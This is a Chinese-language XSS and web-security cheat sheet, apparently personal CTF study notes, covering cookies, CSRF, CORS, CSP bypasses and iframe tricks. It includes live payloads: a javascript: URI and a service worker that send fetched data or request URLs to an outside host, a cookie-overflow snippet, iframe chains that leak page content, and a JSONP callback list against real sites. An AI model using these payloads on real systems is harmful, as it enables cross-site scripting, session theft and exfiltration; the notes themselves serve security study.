--- title: 'XSS 筆記' disqus: cjiso tags: cheatsheet --- :::spoiler TOC [TOC] ::: ### Spec & source code - ref - https://blog.huli.tw/2022/04/24/script-type/ - [sourcegraph](https://sourcegraph.com/github.com/chromium/chromium): search source code - [chromium source code](https://chromium.googlesource.com/) - [web-platform-tests](https://wpt.fyi/results/?label=master&label=experimental&aligned): spec 功能性測試 - [wpt Repo](https://github.com/web-platform-tests/wpt): 可以看詳細 testcase - [canIuse](https://caniuse.com/) ### basic knowledge - https://web.dev/same-site-same-origin/ - Origin: [scheme]+[hostname]+[port] - Site: [scheme]+[TLD+1]+[TLD] - old definition: [TLD+1]+[TLD] - eTLD(effective TLDs): Public Suffix List e.g. `github.io` - https://github.com/publicsuffix/list/ - `https://www.cjis.ooo` - Oriign: `https` + `www.cjis.ooo` + `443` - Site: `https`+`cjis`+`ooo` #### Cookie - [same-site wiki](https://scnps.co/same-site-wiki/docs/main) - [RFC-6265 Cookies: HTTP State Management Mechanism](https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis) - [[Day24] Same-site cookie，CSRF 的救星？](https://ithelp.ithome.com.tw/articles/10326413) - [[Day25] 從 same-site 網站打進你家](https://ithelp.ithome.com.tw/articles/10327197) - cookie `SameSite` attribute - `None`: 無限制 - `Lax`(預設): top-level navigation 發送例如 href 跳轉, form GET - `Strict`: same-site 才發送 - 無 SameSite 的預設 lax(明確指定 SameSite=Lax 不適用) 有兩分鐘內可 top-level, cross-site POST requests， > For any flows involving POST requests, you should test with and without a long delay. This is because both Firefox and Chrome implement a two-minute threshold that permits newly created cookies without the SameSite attribute to be sent on top-level, cross-site POST requests (a common login flow). [ref](https://hacks.mozilla.org/2020/08/changes-to-samesite-cookie-behavior/) - prefix - __Secure- prefix: Cookies with names starting with __Secure- (dash is part of the prefix) must be set with the secure flag from a secure page (HTTPS). - __Host- prefix: Cookies with names starting with __Host- must be set with the secure flag, must be from a secure page (HTTPS), must not have a domain specified (and therefore, are not sent to subdomains), and the path must be /. - `HttpOnly` - https://netsec.expert/posts/mitigation-schmitigation-xss-and-httponly/ - 無法被 javascript 讀寫 - 透過 cookie overflow 洗掉後可寫 ``` for(let i=0;i<1000;++i) { document.cookie = 'cookie'+i+'=aaa'; } // old cookie is delted! document.cookie = 'victim=aaaaaa' ``` ### CSRF - [Cross-Site Request Forgery Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html) - 防禦機制 - token-based - Synchronizer Token Pattern - 透過 HTML、json response 把 CSRF token 傳給 client，client 透過 form hidden field、json、custom header 等方式提交給 server 驗證。 server 需要維護 CSRF token state。 - Double Submit Cookie - 將 CSRF token 透過 cookie 傳給 client，client 讀取 cookie 值後放在 header 或是表單一併提交給 server，server 驗證 cookie 和另一個提交值相同。因為只有 same-origin 可以讀取 cookie，所以可以確保操作 same-origin。另外 server 不用負責維護 CSRF token state。 - Signed Double Submit Cookie - 攻擊者可能透過 XSS 或是 cookie tossing 注入 cookie，因此透過簽章驗證 cookie 避免 client 端偽造 - custom header - SOP 預設只有 same-origin 可以設置 custom header，所以驗證 custom header 是否存在即可 e.g. `X-CSRF-HEADER: 1`。 CORS policy 根據 server response `ccess-Control-Allow-Headers` 可能可以 - non-token-based - Referer header check - SameSite Cookie - CVE-2022-21703 grafana CSRF - 攻擊 - Cookie - Lax - 實作上會有用參數複寫 method 的行為 - `GET /app?_method=POST` - header `X-HTTP-Method-Override` - 支援列表 https://hazanasec.github.io/2023-07-30-Samesite-bypass-method-override.md/ - 無指定 SameSite 的預設 Lax 兩分鐘內可 top-level, cross-site POST requests - Strict/Lax - control subsite - subdomain takeover - Cookie tossing from subdomain - if cookie no `__Host-` prefix - Header - CORS policy loose origin check e.g. `*.target.com` - attack from subdomain `vlun.target.com` - Token in HTML - client-side CSRF - 看起來比較像單純的 XSS? - [facebook “Client-Side” CSRF ](https://www.facebook.com/notes/996734990846339/) - #### __Host - 讓攻擊者無法從 subdomain cookie tossing 複寫 cookie，在架站服務可以防止 subdomain 改寫 root domain e.g. github page - 繞過 - Parser discrepancy - https://portswigger.net/research/cookie-chaos-how-to-bypass-host-and-secure-cookie-prefixes - ```document.cookie=`; {String.fromCodePoint(0x2000)}__Host-name=injected; Domain=.example.com; Path=/;`;``` - 前端保留空白字元視為不同 cookie，後端做正規化去掉空白後當成 __Host cookie - Django 正規化: `[133, 160, 5760, 8192–8202, 8232, 8233, 8239, 8287, 12288]` - ```document.cookie=`$Version=1,__Host-name=injected; Path=/somethingreallylong/; Domain=.example.com;`;``` - java-based 用 `$Version=1` 區分 legacy parsing，但是前端不認 ### mXSS - https://portswigger-labs.net/mxss/ ### CORS - https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS - simple request - one of methods: GET, HEAD, POST - no custom header except [cors-safelisted-request-header](https://fetch.spec.whatwg.org/#cors-safelisted-request-header) - Accept, Accept-Language, Content-Language, Content-Type, Range - Content-Type in > only limit type/subtype but parameter e.g. `text/plain; application/json` bypass validation if server use `includes('application/json')` to determine media type. see CVE-2022-21703 grafana CSRF - `application/x-www-form-urlencoded` - `multipart/form-data` - `text/plain` - etc. - preflight for non-simple request ### some vector - [terjanq/Tiny XSS Payloads](https://github.com/terjanq/Tiny-XSS-Payloads/) - [PortSwagger/XSS Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) ### 黑魔法 #### Run JS via URI - Chromium 可以， Firfox 不行 - 直接攻擊爬蟲 - origin 還是基於前一個頁面，所以需要遵守 CORS - `javascript:fetch('https://ntu.im/flag').then(r=>r.text()).then(d=>fetch('https://cjiso.ninja/'+btoa(d)))';` #### polyglot - https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/ #### window.opener - https://www.cnblogs.com/index-html/p/xss_long_live.html - 受 Same-origin Policy 影響 - window.opener.opener 跨過去 - #### Text Fragments - [New in Chrome 80](https://developers.google.com/web/updates/2020/02/nic80#more) ``` #:~:text=[prefix-,]textStart[,textEnd][,-suffix] context |-------match-----| context ``` - 需要 User Activation 才能觸發 - 搭配 lazy load 之類的 oracle 達成 extract content in the page. - 只能匹配詞且要在同一個 tag 內 - 2020 plaid CTF catalog - https://blog.zeddyu.info/2020/04/24/Plaid-CTF-2020-Web-2/#more - `<meta>` 跳轉 - 從 session 儲存資訊來注入 - Text Fragments + lazy load ### cross-site cookie - 兩分鐘內 navigation 可傳 no samesite cookie https://www.chromestatus.com/feature/5088147346030592 ### window.name 利用 - iframe 跨域 - child frame ``` window.name = 'xxx' ``` - parent frame ``` // 先讓 child parent 同源 // 載入不會刷新 frame frame.src='parent origin...' frame.contentWindow.name ``` - 跳轉繞過長度限制 evil.html ``` // victim first visit evil.html name='qwer' location='xss.html' //redirect to xss site ``` xss.html ``` eval(name) // xss ``` ### form - target 可設 iframe name ``` <iframe name=i1> </iframe> <form target=i1 action="https://c.cjsi.ooo"> </form> ``` - 如果 server 端沒驗 content-type，可傳 json ``` <form enctype=text/plain method=POST> // text/plain 避免被 encode <input name='{"key":"' value='somevalue"}'> </from> ``` - will post with unencoded payload ``{"key":"somevalue"}``, content-type `text/plain` ### iframe 利用 - cheatsheet - 只有 None cookie 會傳入 `<iframe>` - iframe child parent 同域可以互相存取 - iframe 可以用 form target 控制 (含get,post...) - `iframe.name` 可跨域 - iframe 剛創建時沿用 parent CSP - 控制登入、登出、時間延遲確保加載順序 - on-event this - if id exist, this=iframe - else, this=window ``` <body> <!-- 敏感資料 --> <iframe id="qwe" src="https://typeselfsub.web.ctfcompetition.com/flag"> </iframe> <!-- 登出框 --> <iframe id="zxc" name="zxc"> </iframe> <!-- 登入框 --> <iframe id="asd" name="asd"> </iframe> <form id="form1" target="zxc" method="get" action="https://typeselfsub.web.ctfcompetition.com/logout"> </form> <form id="form2" target="asd" method="post" action="https://typeselfsub.web.ctfcompetition.com/login"> <input name="username" value="jizz"> <input name="password" value="jizz"> </form> <script> setTimeout(()=>form1.submit(),2000); setTimeout(()=>form2.submit(),5000); </script> <img src="https://c.cjiso.ninja/delay/10"> </body> ``` - 存取同域 frame ``` window.parent.frames[0] top[0].document... ``` - 串接繞過長度限制 ``` // leak data length 17 <iframe src='/flag'></iframe> <iframe src='/?xss=b=top[0].document'></iframe> <iframe src='/?xss=c=top[1].b.body'></iframe> <iframe src='/?xss=d=top[2].c.innerHTML></iframe> <iframe src='/?xss=name=top[3].d></iframe> ``` ``` // eval length 13 <iframe src='/?xss=a=`fetch("//`' id=start ></iframe> <iframe src='/?xss=top[0].a%2b=`c`'></iframe> <iframe src='/?xss=top[0].a%2b=`.`'></iframe> <iframe src='/?xss=top[0].a%2b=`c`'></iframe> <iframe src='/?xss=top[0].a%2b=`j`'></iframe> <iframe src='/?xss=top[0].a%2b=`i`'></iframe> <iframe src='/?xss=top[0].a%2b=`s`'></iframe> <iframe src='/?xss=top[0].a%2b=`.`'></iframe> <iframe src='/?xss=top[0].a%2b=`o`'></iframe> <iframe src='/?xss=top[0].a%2b=`o`'></iframe> <iframe src='/?xss=top[0].a%2b=`o`'></iframe> <iframe src='/?xss=top[0].a%2b=`"`'></iframe> <iframe src='/?xss=top[0].a%2b=`)`'></iframe> <iframe src='/?xss=name=top[0].a'></iframe> <script> setTimeout(()=>{end.src='/?xss=eval(name)'},2000) </script> ``` #### `iframe srcdoc` - https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/april/a-novel-csp-bypass-using-data-uri/ - [[Google CTF 2020] all the little things](https://ctftime.org/writeup/23060) - 和 parent 同源 ``` <iframe srcdoc=" <script src=/theme?cb=window.b.innerText=window.parent.document.body.innerText.slice></script> <script src=/theme?cb=window.img.src=window.total.innerText.slice></script> "> </iframe> ``` ### WAF bypass #### newbie - 大小寫 - 雙寫 - 拼接 - top - 編碼 #### 替代姿勢 - url - https://splitline.github.io/domain-obfuscator/ - html - `/` 代替空格 `<iframe/src=javascript:alert(1)></iframe>` - 寫 entity 再跳`document.body.innerHTML=document.body.innerText` - js - ``` ` ```代替 `'` - regex `/a/.source` - string template - `\u2028, \u2029` 代替 `\n`： `eval('x=123\u2028alert(x)')` #### charset - `<meta>` 改 charset - https://wooyun.js.org/drops/XSS%E5%92%8C%E5%AD%97%E7%AC%A6%E9%9B%86%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B%E5%84%BF.html ### 解析姿勢 #### 協議 - 通用 - scheme 可大小寫 - `//` 解析成 `http://` - `\\ 解析成當前域協議` - `javascript:` - 效力等同 eval - 可放分隔符執行多行 `\n\tjavascript:alert(2)%0aalert(1)` - 分隔符: %0a,%0b,%0c,%0d,%20,%3b - 前頭會 trim - windows - `\\ 解析成 file://` #### 變數 - 預設全域=window, e.g.`window.name == name` ### 跳轉 - 任意 - meta:`<meta http-equiv="refresh" content="0;URL='http://url/'" />` - `location.href` - `location.host` - `location.hostname` - `location.replace` - `location.assign` - 子路徑 - `location.pathname` ### on-event #### 參考 - https://xz.aliyun.com/t/4067 #### auto - `onfocus` - `<input>,<select>,<form>,<textarea>` - `<keygen>` less supported - 在 iframe 裡仍有效 - 在 top 比 iframe 優先順序高，但不會造成 onblur - `<input autofocus onfocus=alert(1)>` - `ontoggle` - `<details open ontoggle=alert(1)` - `onerror` - `<img src='aaaaaa' onerror=alert(1)>` - `onscroll` - `<body onscroll=alert>`+n*`<br>`+`<input autofocus>` - `onstart` - firefox:`<marquee onstart=alert(1)></marquee>` - `<iframe src=javascript:alert(1)` ### 監聽 #### Request - Service worker - sw.js 要和註冊域同域，xss 搭配同域檔案才能達成 - register a service worker > if no scope, default scope is the same level of the script ``` if ('serviceWorker' in navigator) { window.addEventListener('load', function() { navigator.serviceWorker.register('/sw.js', {scope:'/'}).then(function(registration) { // Registration was successful console.log('ServiceWorker registration successful with scope: ', registration.scope); }, function(err) { // registration failed :( console.log('ServiceWorker registration failed: ', err); }); }); } ``` - listen (sw.js) ``` self.addEventListener('fetch', function(e) { e.respondWith(caches.match(e.request).then(function(response) { fetch('https://c.cjsio.ninja/swdata/' + e.request.url) }); - ref - https://medium.com/bugbountywriteup/pooot-writeup-217384a6b69c - https://developers.google.com/web/fundamentals/primers/service-workers ``` ### 參數解析順序 - Javascript - `URLSearchParams.get`: first - PHP - `$_GET`: Last ### Payload - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#restricted-characters ### 高級黑魔法 #### `about:blank` - 可以更改 cross-origin 的 iframe location 到 `about:blank` - 更改後的 origin 會是 null，可以更改 innerHTML - https://twitter.com/Tox1k0/status/1598363050666561549 - https://portswigger.net/research/bypassing-csp-with-dangling-iframes #### Dom clobbering - https://blog.techbridge.cc/2021/01/23/dom-clobbering/ #### Disable CSP - attack reverse-proxy - load iframe with `src=/%gg` make reverse-proxy suck and then response bad request without csp header. - - [arbitrary-parentheses-less-xss](https://medium.com/@terjanq/arbitrary-parentheses-less-xss-e4a1cf37c13d) - [2023 seccon ctf SimpleCalc](https://blog.huli.tw/2023/09/23/hitcon-seccon-ctf-2023-writeup/#simplecalc-23-solves) #### unclassified - [Without-Parentheses](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) #### Cookie race condition - 在跳轉請求的第二次請求前改 cookie，可讓兩次請求夾帶不同 cookie - https://ctftime.org/writeup/29310?utm_source=pocket_mylist #### Cookie subpath - 將 cookie path 設在特定端點，使得當前頁面和 api 呼叫的使用者不同 ``` 'id=jizzzzzz; path=/' 'id=bbbbbbbb; path=/api' get('/api') 會帶 cookie `id=bbbbbbbb;id=jizzzzzz`， server 端通常解析第一個 ``` #### Bypass CSP via js added by CDN - 一些 CDN 會自動掛載 js 檔案在某路徑下，有些檔案可以利用就能繞過 unsafe-eval - https://twitter.com/kinugawamasato/status/1414648695904083988 - https://twitter.com/kinugawamasato/status/893404078365069312?lang=en - https://blog.brycec.me/posts/corctf_2021_challenges/#blogme - Cloudflare - https://demo.vwzq.net/cloudflare/unobfuscate.html - https://l0.cm/cf_cspbypass.html > Cloudflare's pages have a /cdn-cgi/ directory with some interesting resources: > - scripts/{cf.common.js,cf.challenge.js,zepto.min.js} > - trace/ #### Service Worker - 跨域攻擊、攔截請求 - https://www.chainnews.com/zh-hant/articles/220684059052.htm - https://blog.brycec.me/posts/corctf_2021_challenges/#blogme - 如果 service worker 本身有洞， 只要 main thread 能載入 worker.js 就能利用 #### HTTPLeak - 可以用來測試 web proxy 是否全部都 proxy 到，或是 CSP 沒擋到 - https://github.com/cure53/HTTPLeaks #### jsonp - [JSONBee](https://github.com/zigoo0/JSONBee) :::spoiler list ``` #Google.com: "><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script> "><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script> "><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script> "><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script> "><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script> #Blogger.com: "><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script> #Yandex: "><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script> "><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script> #VK.com: "><script src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script> #Marketo.com "><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> "><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> #AlibabaGroup: "><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script> "><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script> "><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script> "><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script> "><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script> "><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script> "><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script> #Uber.com: "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script> #Buzzfeed.com "><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f"></script> #Yahoo JP (Thanks to @nizam0906) "><script src=https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)//></script> "><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1337)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script> #AOL/Yahoo "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script> "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script> "><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script> ">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb=alert();"></script> "><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback=confirm"></script> "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> "><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script> "><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script> #Twitter.com: "><script+src="http://search.twitter.com/trends.json?callback=alert()"></script> "><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script> "><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script> #Others: "><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script> "><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script> "><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script> "><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script> "><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script> "><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script> "><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script> "><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script> "><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script> "><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script> "><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script> #Google API's "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always> "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script> ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script> ``` - https://blog.splitline.tw/hackmd-xss/ ::: #### sourceMappingURL ``` <script> //# sourceMappingURL=http://c.cjis.ooo/xssnote </script> ``` - 開啟 devtool 才會發送，可設 cookie - 可跨域發送，bypass CSP，不會顯示在 devtool/Network - anti-debug, inspect researcher - https://weizman.github.io/page-js-anti-debug-1/ ### self-XSS - https://blog.slonser.info/posts/make-self-xss-great-again/ -